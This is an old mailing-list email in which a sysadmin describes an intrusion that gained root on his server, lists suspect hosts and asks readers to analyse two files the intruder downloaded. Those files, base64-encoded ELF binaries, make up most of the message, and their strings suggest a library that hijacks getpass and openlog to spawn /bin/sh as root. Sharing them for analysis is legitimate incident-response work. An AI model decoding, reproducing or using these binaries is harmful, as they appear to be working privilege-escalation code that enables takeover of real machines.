--------------33BD24AB1E619FBC4599098
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
excuse me because of this offtopic, but I think this is also very
interesting to You (good programers).
At Dec 30 we had a visit of someone from sampo.karelia.ru.
We don't know where he got the passwd of one of our users,
but ... shit happens.
The first thing he/she/it did was downloading two files named:
my_lib and my_library.so (attached).
Two days after that (main logs are cleared), he got the root-password.
Don't ask me how, it is a shadow System with /etc/shadow readonly for
root.
He/she/it installed a new /etc/shadow with himself as a user and
installed a tcp/ip-snooper to get more passwords.
NOW MY QUESTION IS HOW DID HE GET THE PASSWORD? Maybe with my_lib* ?
May someone have a look at this files, please and mail me his comment?
And beware from logins of these hosts:
sampo.karelia.ru
kftt-runnet.karelia.ru
www.ci.houston.tx.us
ashton.lib.dixie.edu
ferret-world.csc.peachnet.edu
gw.kppublish.ru
Best wishes for the new year,
Harald
-- Harald Hoyer saturn@studbox.uni-stuttgart.de http://saturnnet.wh.uni-stuttgart.de/~saturn ------------------------------------------------------------------------- > Someone: > Asking Linus to add such things in the kernel is as pertinent as asking > to still support 80286 CPU (IMHO). We are working on it. Alan Cox--------------33BD24AB1E619FBC4599098 Content-Type: application/octet-stream; name="my_lib" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="my_lib"
f0VMRgEBAQAAAAAAAAAAAAEAAwABAAAAAAAAAAAAAAAsAgAAAAAAADQAAAAAACgACwAIAAAA AAAAAAAAAAAAAFWJ5VPoAAAAAFuBwwMAAACNkwAAAACJ0FDo/P///4PEBItd/InsXcOQkJCQ kJCQkFWJ5VPoAAAAAFuBwwMAAACNkwAAAACJ0FDo/P///4PEBItd/InsXcMIAAAAAAAAAAEA AAAwMS4wMQAAAC9iaW4vc2gAAEdDQzogKEdOVSkgMi43LjAAAC5zeW10YWIALnN0cnRhYgAu c2hzdHJ0YWIALnRleHQALnJlbC50ZXh0AC5kYXRhAC5ic3MALm5vdGUALnJvZGF0YQAuY29t bWVudAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAQA8f8JAAAAAAAAAAAAAAABAAEA AAAAAAAAAAAAAAAAAwAGAAAAAAAAAAAAAAAAAAMAAQAAAAAAAAAAAAAAAAADAAMAAAAAAAAA AAAAAAAAAwAEAAAAAAAAAAAAAAAAAAMABQAAAAAAAAAAAAAAAAADAAcAGAAAAAAAAAAoAAAA EgABACAAAAAAAAAAAAAAABAAAAA2AAAAAAAAAAAAAAAQAAAAPQAAADAAAAAoAAAAEgABAABt eWxpYi5jAGdjYzJfY29tcGlsZWQuAG9wZW5sb2cAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAHN5 c3RlbQBnZXRwYXNzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAbAAAAAQAAAAYAAAAAAAAAQAAAAFgAAAAAAAAAAAAAABAAAAAAAAAAIQAAAAkAAAAAAAAA AAAAAOQDAAAwAAAACQAAAAEAAAAEAAAACAAAACsAAAABAAAAAwAAAAAAAACYAAAAAAAAAAAA AAAAAAAABAAAAAAAAAAxAAAACAAAAAMAAAAAAAAAmAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAA NgAAAAcAAAAAAAAAAAAAAJgAAAAUAAAAAAAAAAAAAAABAAAAAAAAADwAAAABAAAAAgAAAAAA AACsAAAACAAAAAAAAAAAAAAAAQAAAAAAAABEAAAAAQAAAAAAAAAAAAAAtAAAABIAAAAAAAAA AAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMYAAABNAAAAAAAAAAAAAAABAAAAAAAAAAEA AAACAAAAAAAAAAAAAAAUAQAA0AAAAAoAAAAJAAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAA 5AEAAEUAAAAAAAAAAAAAAAEAAAAAAAAADAAAAAoKAAASAAAACQMAABoAAAAECwAAPAAAAAoK AABCAAAACQMAAEoAAAAECwAA --------------33BD24AB1E619FBC4599098 Content-Type: application/octet-stream; name="my_library.so" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="my_library.so"
f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAkAIAADQAAAAkBQAAAAAAADQAIAADACgAFQASAAEA AACUAAAAlAAAAAAAAAD9AgAA/QIAAAUAAAAAEAAAAQAAAJgDAACYEwAAAAAAAKQAAACkAAAA BgAAAAAQAAACAAAAxAMAAMQTAAAAAAAAeAAAAHgAAAAGAAAABAAAAAMAAAANAAAACgAAAAwA AAACAAAAAAAAAAAAAAALAAAABAAAAAUAAAAAAAAACQAAAAYAAAAHAAAAAQAAAAAAAAADAAAA CAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAxBMAAAAAAAARAPH/CgAAAKgTAAAAAAAAEQDx/yAA AADQAgAAKAAAABIACAAoAAAAAAAAAAAAAAAQAAAALwAAAAADAAAoAAAAEgAIADcAAAAAAAAA AAAAABAAAABDAAAAAAAAAAAAAAAQAAAATQAAAAAAAAAAAAAAEAAAAFQAAACEAwAAAAAAABEA 8f9bAAAAPBQAAAAAAAARAPH/YgAAADwUAAAAAAAAEQDx/24AAAA8FAAAAAAAABEA8f8AX0RZ TkFNSUMAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAG9wZW5sb2cAc3lzdGVtAGdldHBhc3MAX19f YnJrX2FkZHIAX19lbnZpcm9uAGF0ZXhpdABfZXRleHQAX2VkYXRhAF9fYnNzX3N0YXJ0AF9l bmQAcm9vdC1hY2Nlc3MAALwTAAAGBgAAwBMAAAYHAAC0EwAABwQAALgTAAAHCAAA6N8AAAAA AAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD///8AAAAA AAAAAAAAAABWU+gAAAAAW4HDEREAAI2D+P///41wBIN4BAB0D5CQkIsG/9CDxgSDPgB19Fte w5BT6AAAAABbgcPiEAAAW8OQVYnlU+gAAAAAW4HDzxAAAI2T4e///4nQUOh2////g8QEi138 iexdw5CQkJCQkJCQVYnlU+gAAAAAW4HDnxAAAI2T4e///4nQUOhG////g8QEi138iexdw5CQ kJCQkJCQVlPoAAAAAFuBw3EQAACNg/T///+NcPyDePz/dA+QkJCLBv/Qg8b8gz7/dfRbXsOQ U+gAAAAAW4HDQhAAAIuDFAAAAIuTGAAAAIsSiRDo8v7//1vD6Af///8vYmluL3NoAAAAAAAA AAD/////AAAAAP////8AAAAAxBMAAAAAAAAAAAAAagIAAHoCAAAAAAAAAAAAAA4AAABzAAAA BAAAAJQAAAAFAAAArAEAAAYAAADcAAAACgAAAH8AAAALAAAAEAAAAAMAAACoEwAAAgAAABAA AAAUAAAAEQAAABcAAAA8AgAAEQAAACwCAAASAAAAEAAAABMAAAAIAAAAFgAAAAAAAAAAAAAA AAAAAABHQ0M6IChHTlUpIDIuNi40IHNuYXBzaG90IDk1MDUxOAAAR0NDOiAoR05VKSAyLjcu MAAAR0NDOiAoR05VKSAyLjYuNCBzbmFwc2hvdCA5NTA1MTgAAC5zeW10YWIALnN0cnRhYgAu c2hzdHJ0YWIALmhhc2gALmR5bnN5bQAuZHluc3RyAC5yZWwuZ290AC5yZWwucGx0AC5pbml0 AC5wbHQALnRleHQALmZpbmkALnJvZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5 bmFtaWMALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAABIAAAAAgAAAAAAAAAEAAAABAAAACEAAAALAAAA AgAAANwAAADcAAAA0AAAAAMAAAABAAAABAAAABAAAAApAAAAAwAAAAIAAACsAQAArAEAAH8A AAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAALAIAACwCAAAQAAAAAgAAAA4AAAAEAAAA CAAAADoAAAAJAAAAAgAAADwCAAA8AgAAEAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYA AABMAgAATAIAAAUAAAAAAAAAAAAAAAEAAAAAAAAASQAAAAEAAAAGAAAAVAIAAFQCAAAwAAAA AAAAAAAAAAAEAAAABAAAAE4AAAABAAAABgAAAJACAACQAgAA9AAAAAAAAAAAAAAAEAAAAAAA AABUAAAAAQAAAAYAAACEAwAAhAMAAAUAAAAAAAAAAAAAAAEAAAAAAAAAWgAAAAEAAAACAAAA iQMAAIkDAAAIAAAAAAAAAAAAAAABAAAAAAAAAGIAAAABAAAAAwAAAJgTAACYAwAAAAAAAAAA AAAAAAAABAAAAAAAAABoAAAAAQAAAAMAAACYEwAAmAMAAAgAAAAAAAAAAAAAAAQAAAAAAAAA bwAAAAEAAAADAAAAoBMAAKADAAAIAAAAAAAAAAAAAAAEAAAAAAAAAHYAAAABAAAAAwAAAKgT AACoAwAAHAAAAAAAAAAAAAAABAAAAAQAAAB7AAAABgAAAAMAAADEEwAAxAMAAHgAAAADAAAA AAAAAAQAAAAIAAAAhAAAAAgAAAADAAAAPBQAADwEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAIkA AAABAAAAAAAAAAAAAAA8BAAAVgAAAAAAAAAAAAAAAQAAAAAAAAARAAAAAwAAAAAAAAAAAAAA kgQAAJIAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAGwIAAAQAwAAFAAAACUA AAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAAB8CwAAGwEAAAAAAAAAAAAAAQAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABAAAAAAAAAAAAAAAAAAMAAgAAAAAAAAAAAAAA AAADAAMAAAAAAAAAAAAAAAAAAwAEAAAAAAAAAAAAAAAAAAMABQAAAAAAAAAAAAAAAAADAAYA AAAAAAAAAAAAAAAAAwAHAAAAAAAAAAAAAAAAAAMACAAAAAAAAAAAAAAAAAADAAkAAAAAAAAA AAAAAAAAAwAKAAAAAAAAAAAAAAAAAAMACwAAAAAAAAAAAAAAAAADAAwAAAAAAAAAAAAAAAAA AwANAAAAAAAAAAAAAAAAAAMADgAAAAAAAAAAAAAAAAADAA8AAAAAAAAAAAAAAAAAAwAQAAAA AAAAAAAAAAAAAAMAEQAAAAAAAAAAAAAAAAADABIAAAAAAAAAAAAAAAAAAwATAAAAAAAAAAAA AAAAAAMAFAABAAAAAAAAAAAAAAAEAPH/DAAAAJACAAAAAAAAAQAIABsAAACQAgAAAAAAAAIA CAAxAAAAoBMAAAAAAAABAA0APwAAAMACAAAAAAAAAgAIAEoAAACYEwAAAAAAAAEACwBYAAAA mBMAAAAAAAABAAwAAQAAAAAAAAAAAAAABADx/wwAAAAwAwAAAAAAAAEACABmAAAAMAMAAAAA AAACAAgAfAAAAJwTAAAAAAAAAQAMAIkAAABgAwAAAAAAAAIACABKAAAAmBMAAAAAAAABAAsA lAAAAKQTAAAAAAAAAQANAKEAAAAAAAAAAAAAAAQA8f8MAAAA0AIAAAAAAAABAAgAqQAAAMQT AAAAAAAAEQDx/7IAAACEAwAAAAAAABEA8f+5AAAAAAMAACgAAAASAAgAwQAAAAAAAAAAAAAA EAAAAMgAAAAAAAAAAAAAABAAAADUAAAAAAAAAAAAAAAQAAAA3gAAANACAAAoAAAAEgAIAOYA AAA8FAAAAAAAABEA8f/yAAAAAAAAAAAAAAAQAAAA+QAAADwUAAAAAAAAEQDx/wABAACoEwAA AAAAABEA8f8WAQAAPBQAAAAAAAARAPH/AGNydHN0dWZmLmMAZ2NjMl9jb21waWxlZC4AX19k b19nbG9iYWxfZHRvcnNfYXV4AF9fRFRPUl9MSVNUX18AZmluaV9kdW1teQBmb3JjZV90b19k YXRhAF9fQ1RPUl9MSVNUX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AF9fQ1RPUl9FTkRfXwBp bml0X2R1bW15AF9fRFRPUl9FTkRfXwBteWxpYi5jAF9EWU5BTUlDAF9ldGV4dABnZXRwYXNz AHN5c3RlbQBfX19icmtfYWRkcgBfX2Vudmlyb24Ab3BlbmxvZwBfX2Jzc19zdGFydABhdGV4 aXQAX2VkYXRhAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfZW5kAA== --------------33BD24AB1E619FBC4599098--